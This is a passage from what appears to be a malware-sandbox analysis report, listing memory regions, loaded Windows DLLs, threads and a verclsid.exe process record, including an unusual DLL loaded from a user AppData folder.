name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 3959
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 3960
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 3961
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 3962
start_va = 0x7fefadf0000
end_va = 0x7fefadf9fff
monitored = 0
entry_point = 0x7fefadf260c
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 3963
start_va = 0x7fefd6a0000
end_va = 0x7fefd70cfff
monitored = 0
entry_point = 0x7fefd6a1010
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 3964
start_va = 0xc0000
end_va = 0x10ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 3965
start_va = 0x370000
end_va = 0x46ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000370000"
filename = ""
Region:
id = 3966
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3967
start_va = 0x100000
end_va = 0x10ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000100000"
filename = ""
Region:
id = 3968
start_va = 0x470000
end_va = 0x5f7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000470000"
filename = ""
Region:
id = 3969
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3970
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 3971
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 3972
start_va = 0x600000
end_va = 0x780fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000600000"
filename = ""
Region:
id = 3973
start_va = 0x790000
end_va = 0x1b8ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000790000"
filename = ""
Region:
id = 3974
start_va = 0x20000
end_va = 0x20fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "taskeng.exe.mui"
filename = "\\Windows\\System32\\en-US\\TaskEng.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskeng.exe.mui")
Region:
id = 3975
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 3976
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 3977
start_va = 0x1b90000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b90000"
filename = ""
Region:
id = 3978
start_va = 0x1b0000
end_va = 0x22cfff
monitored = 0
entry_point = 0x1bcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 3979
start_va = 0x270000
end_va = 0x36ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000270000"
filename = ""
Region:
id = 3980
start_va = 0x1b0000
end_va = 0x22cfff
monitored = 0
entry_point = 0x1bcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 3981
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 3982
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 3983
start_va = 0x1db0000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001db0000"
filename = ""
Region:
id = 3984
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 3985
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 3986
start_va = 0x7fefd490000
end_va = 0x7fefd4a7fff
monitored = 0
entry_point = 0x7fefd493b48
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 3987
start_va = 0x1b0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x1b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3988
start_va = 0x1b0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x1b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3989
start_va = 0x1b0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x1b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3990
start_va = 0x1b0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x1b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3991
start_va = 0x1b0000
end_va = 0x1f4fff
monitored = 0
entry_point = 0x1b1064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3992
start_va = 0x7fefd190000
end_va = 0x7fefd1d6fff
monitored = 0
entry_point = 0x7fefd191064
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 3993
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 3994
start_va = 0x1e40000
end_va = 0x1ebffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e40000"
filename = ""
Region:
id = 3995
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 3996
start_va = 0x7fefda40000
end_va = 0x7fefda64fff
monitored = 0
entry_point = 0x7fefda49658
region_type = mapped_file
name = "sspicli.dll"
filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll")
Region:
id = 3997
start_va = 0x1ec0000
end_va = 0x1fbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ec0000"
filename = ""
Region:
id = 3998
start_va = 0x1d0000
end_va = 0x24ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001d0000"
filename = ""
Region:
id = 3999
start_va = 0x7fffffd7000
end_va = 0x7fffffd8fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4000
start_va = 0x1fc0000
end_va = 0x228efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 4001
start_va = 0x7fefdb60000
end_va = 0x7fefdb73fff
monitored = 0
entry_point = 0x7fefdb610e0
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 4002
start_va = 0x1d20000
end_va = 0x1d9ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d20000"
filename = ""
Region:
id = 4003
start_va = 0x7fffffd5000
end_va = 0x7fffffd6fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd5000"
filename = ""
Region:
id = 4004
start_va = 0x2330000
end_va = 0x23affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002330000"
filename = ""
Region:
id = 4005
start_va = 0x7fffffd3000
end_va = 0x7fffffd4fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd3000"
filename = ""
Region:
id = 4006
start_va = 0xe0000
end_va = 0xe0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000000e0000"
filename = ""
Region:
id = 4007
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4008
start_va = 0x7fefab50000
end_va = 0x7fefab58fff
monitored = 0
entry_point = 0x7fefab511a0
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 4009
start_va = 0x7fefc4d0000
end_va = 0x7fefc525fff
monitored = 0
entry_point = 0x7fefc4dbbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4010
start_va = 0x1b90000
end_va = 0x1c0ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b90000"
filename = ""
Region:
id = 4011
start_va = 0x1c80000
end_va = 0x1cfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c80000"
filename = ""
Region:
id = 4012
start_va = 0x7fefc060000
end_va = 0x7fefc094fff
monitored = 0
entry_point = 0x7fefc061064
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 4013
start_va = 0x23e0000
end_va = 0x245ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000023e0000"
filename = ""
Region:
id = 4014
start_va = 0x2460000
end_va = 0x253efff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002460000"
filename = ""
Region:
id = 4015
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 4016
start_va = 0x7fefc0a0000
end_va = 0x7fefc0b7fff
monitored = 0
entry_point = 0x7fefc0a1130
region_type = mapped_file
name = "dwmapi.dll"
filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll")
Thread:
id = 148
os_tid = 0x500
Thread:
id = 149
os_tid = 0x514
Thread:
id = 150
os_tid = 0x518
Thread:
id = 151
os_tid = 0x528
Thread:
id = 152
os_tid = 0x52c
Thread:
id = 153
os_tid = 0x530
Thread:
id = 154
os_tid = 0x548
Thread:
id = 264
os_tid = 0x624
Process:
id = "26"
image_name = "verclsid.exe"
filename = "c:\\windows\\system32\\verclsid.exe"
page_root = "0x7ab5b000"
os_pid = "0x558"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "25"
os_parent_pid = "0x4fc"
cmd_line = "verclsid.exe /S /C {A78ED123-AB77-406B-9999-2A5D9D2F7FB7}"
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4179
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4180
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4181
start_va = 0x40000
end_va = 0x41fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4182
start_va = 0x70000
end_va = 0xeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 4183
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4184
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4185
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4186
start_va = 0xfffd0000
end_va = 0xfffd6fff
monitored = 0
entry_point = 0xfffd1b64
region_type = mapped_file
name = "verclsid.exe"
filename = "\\Windows\\System32\\verclsid.exe" (normalized: "c:\\windows\\system32\\verclsid.exe")
Region:
id = 4187
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4188
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4189
start_va = 0x7fffffdd000
end_va = 0x7fffffddfff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 4190
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4191
start_va = 0xf0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000f0000"
filename = ""
Region:
id = 4192
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4193
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4194
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4195
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4196
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4197
start_va = 0xf0000
end_va = 0x156fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4198
start_va = 0x2b0000
end_va = 0x3affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002b0000"
filename = ""
Region:
id = 4199
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4200
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 4201
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4202
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4218
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4219
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4220
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4221
start_va = 0x50000
end_va = 0x6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 4222
start_va = 0x160000
end_va = 0x25ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000160000"
filename = ""
Region:
id = 4223
start_va = 0x3b0000
end_va = 0x537fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003b0000"
filename = ""
Region:
id = 4224
start_va = 0x260000
end_va = 0x288fff
monitored = 0
entry_point = 0x261010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4225
start_va = 0x260000
end_va = 0x288fff
monitored = 0
entry_point = 0x261010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4226
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4227
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4228
start_va = 0x540000
end_va = 0x6c0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000540000"
filename = ""
Region:
id = 4229
start_va = 0x6d0000
end_va = 0x1acffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000006d0000"
filename = ""
Region:
id = 4251
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 4252
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 4253
start_va = 0x60000
end_va = 0x6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000060000"
filename = ""
Region:
id = 4254
start_va = 0x1ad0000
end_va = 0x1b4cfff
monitored = 0
entry_point = 0x1adcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4255
start_va = 0x1ad0000
end_va = 0x1b4cfff
monitored = 0
entry_point = 0x1adcec8
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 4256
start_va = 0x7fefda70000
end_va = 0x7fefda7efff
monitored = 0
entry_point = 0x7fefda71010
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 4257
start_va = 0x7fefc4d0000
end_va = 0x7fefc525fff
monitored = 0
entry_point = 0x7fefc4dbbc0
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 4258
start_va = 0x1ad0000
end_va = 0x1c2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001ad0000"
filename = ""
Region:
id = 4340
start_va = 0x1ad0000
end_va = 0x1baefff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000001ad0000"
filename = ""
Region:
id = 4341
start_va = 0x1bb0000
end_va = 0x1c2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001bb0000"
filename = ""
Region:
id = 4342
start_va = 0x7fefa530000
end_va = 0x7fefa586fff
monitored = 0
entry_point = 0x7fefa531118
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 4343
start_va = 0x260000
end_va = 0x260fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000260000"
filename = ""
Region:
id = 4344
start_va = 0x7fefe170000
end_va = 0x7fefe208fff
monitored = 0
entry_point = 0x7fefe171c10
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 4345
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4346
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4347
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 4362
start_va = 0x270000
end_va = 0x270fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000270000"
filename = ""
Region:
id = 4364
start_va = 0x1c30000
end_va = 0x1c72fff
monitored = 1
entry_point = 0x1c58ed0
region_type = mapped_file
name = "b79266.dll"
filename = "\\Users\\kEecfMwgj\\AppData\\Local\\{D77D06B2-C71E-C031-9266-658FBD2652B7}\\B79266.DLL" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\{d77d06b2-c71e-c031-9266-658fbd2652b7}\\b79266.dll")
Region:
id = 4365
start_va = 0x7fefb560000
end_va = 0x7fefb577fff
monitored = 0
entry_point = 0x7fefb561010
region_type = mapped_file
name = "mpr.dll"
filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll")
Region:
id = 4366
start_va = 0x7fefc970000
end_va = 0x7fefc978fff
monitored = 0
entry_point = 0x7fefc971070
region_type = mapped_file
name = "wsock32.dll"
filename = "\\Windows\\System32\\wsock32.dll" (normalized: "c:\\windows\\system32\\wsock32.dll")
Region:
id = 4382
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 4383
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 4384
start_va = 0x1c80000
end_va = 0x1e2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001c80000"
filename = ""
Region:
id = 4385
start_va = 0x1e30000
end_va = 0x1f6ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e30000"
filename = ""
Region:
id = 4386
start_va = 0x7fefe4f0000
end_va = 0x7feff277fff
monitored = 0
entry_point = 0x7fefe56cebc
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 4387
start_va = 0x7fefe210000
end_va = 0x7fefe280fff
monitored = 0
entry_point = 0x7fefe221e20
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 4388
start_va = 0x7feffda0000
end_va = 0x7fefff17fff
monitored = 0
entry_point = 0x7feffda10e0
region_type = mapped_file
name = "urlmon.dll"
filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll")
Region:
id = 4389
start_va = 0x7fefdf70000
end_va = 0x7fefe099fff
monitored = 0
entry_point = 0x7fefdf710d4
region_type = mapped_file
name = "wininet.dll"
filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll")
Region:
id = 4391
start_va = 0x7fefe290000
end_va = 0x7fefe4e8fff
monitored = 0
entry_point = 0x7fefe291340
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 4392
start_va = 0x7fefdde0000
end_va = 0x7fefdf4cfff
monitored = 0
entry_point = 0x7fefdde10b4
region_type = mapped_file
name = "crypt32.dll"
filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll")
Region:
id = 4393
start_va = 0x7fefdc20000
end_va = 0x7fefdc2efff
monitored = 0
entry_point = 0x7fefdc21020
region_type = mapped_file
name = "msasn1.dll"
filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll")
Region:
id = 4394
start_va = 0x7fefb670000
end_va = 0x7fefb696fff
monitored = 0
entry_point = 0x7fefb6798bc
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 4395
start_va = 0x7fefb660000
end_va = 0x7fefb66afff
monitored = 0
entry_point = 0x7fefb661198
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 4397
start_va = 0x1f70000
end_va = 0x223efff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "sortdefault.nls"
